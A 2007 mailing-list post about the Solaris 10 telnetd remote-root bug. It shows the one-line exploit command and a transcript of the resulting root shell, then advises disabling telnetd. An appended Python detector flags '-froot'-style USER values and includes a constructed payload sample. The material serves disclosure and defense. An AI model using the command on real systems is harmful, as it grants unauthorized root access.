[rescue] Solaris 10 Remote-Root Exploit

Jonathan C. Patschke jp at celestrion.net
Mon Feb 12 07:45:40 CST 2007


Just saw this on Slashdot:

   http://riosec.com/solaris-telnet-0-day

And verified that it works:

   [jp at cobra:~]$ telnet -l"-froot" lic4
   Trying 10.10.100.120...
   Connected to lic4.centtech.com.
   Escape character is '^]'.
   Last login: Wed Jan 17 16:53:28 from hal10.centtech.
   Sun Microsystems Inc.   SunOS 5.10      Generic January 2005
   You have mail.
   # Connection closed by foreign host.
   [jp at cobra:~]$ exit
   Connection to cobra.centtech.com closed.

If you have any public-facing systems running Solaris's telnetd, you
should disable it now.  Even turning off remote root logins is
insufficient, since this seems to bypass PAM.

-- 
Jonathan Patschke ) "I would buy a Mac today if I was not working at
Elgin, TX        (   Microsoft."      --Jim Allchin, VP of Platforms
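
One way to detect the login shown above on the wire, as an added example that is not part of the original post: `telnet -l` sends its argument to the server as the `USER` variable in a NEW-ENVIRON subnegotiation (RFC 1572), so a monitor can parse the client-to-server bytes and flag a `USER` value that begins with `-`. The function names and the sample byte strings are constructed for illustration.

```python
IAC, SB, SE, NEW_ENVIRON = 255, 250, 240, 39   # RFC 854 / RFC 1572
IS, INFO = 0, 2                                # subnegotiation commands that carry values
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3          # field markers inside the payload

def subnegotiations(stream):
    """Yield (option, payload) for every complete IAC SB ... IAC SE block."""
    i, n = 0, len(stream)
    while i + 2 < n:
        if stream[i] != IAC:
            i += 1
        elif stream[i + 1] != SB:
            i += 2                       # IAC IAC (literal 0xFF) or another command
        else:
            option, payload, i = stream[i + 2], bytearray(), i + 3
            while i < n:
                if stream[i] == IAC and stream[i + 1:i + 2] == bytes([SE]):
                    yield option, bytes(payload)
                    i += 2
                    break
                if stream[i] == IAC and stream[i + 1:i + 2] == bytes([IAC]):
                    i += 1               # IAC IAC inside SB is one data byte 0xFF
                payload.append(stream[i])
                i += 1

def environ_vars(payload):
    """Parse a NEW-ENVIRON IS/INFO payload into {name: value}."""
    if not payload or payload[0] not in (IS, INFO):
        return {}
    pairs, target, i = [], None, 1
    while i < len(payload):
        b = payload[i]
        if b in (VAR, USERVAR):
            pairs.append([bytearray(), bytearray()])   # [name, value]
            target = 0
        elif b == VALUE and pairs:
            target = 1
        elif target is not None:
            if b == ESC and i + 1 < len(payload):
                i += 1                   # ESC quotes the next byte
            pairs[-1][target].append(payload[i])
        i += 1
    return {n.decode("latin-1"): v.decode("latin-1") for n, v in pairs}

def suspicious_user(stream):
    """Return the USER value if it starts with '-', otherwise None."""
    for option, payload in subnegotiations(stream):
        user = environ_vars(payload).get("USER") if option == NEW_ENVIRON else None
        if user is not None and user.startswith("-"):
            return user
    return None

# Constructed client-to-server bytes: IAC WILL NEW-ENVIRON, then USER=-froot.
CONSTRUCTED_SESSION = bytes([IAC, 251, NEW_ENVIRON, IAC, SB, NEW_ENVIRON, IS, VAR]) \
    + b"USER" + bytes([VALUE]) + b"-froot" + bytes([IAC, SE])
```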


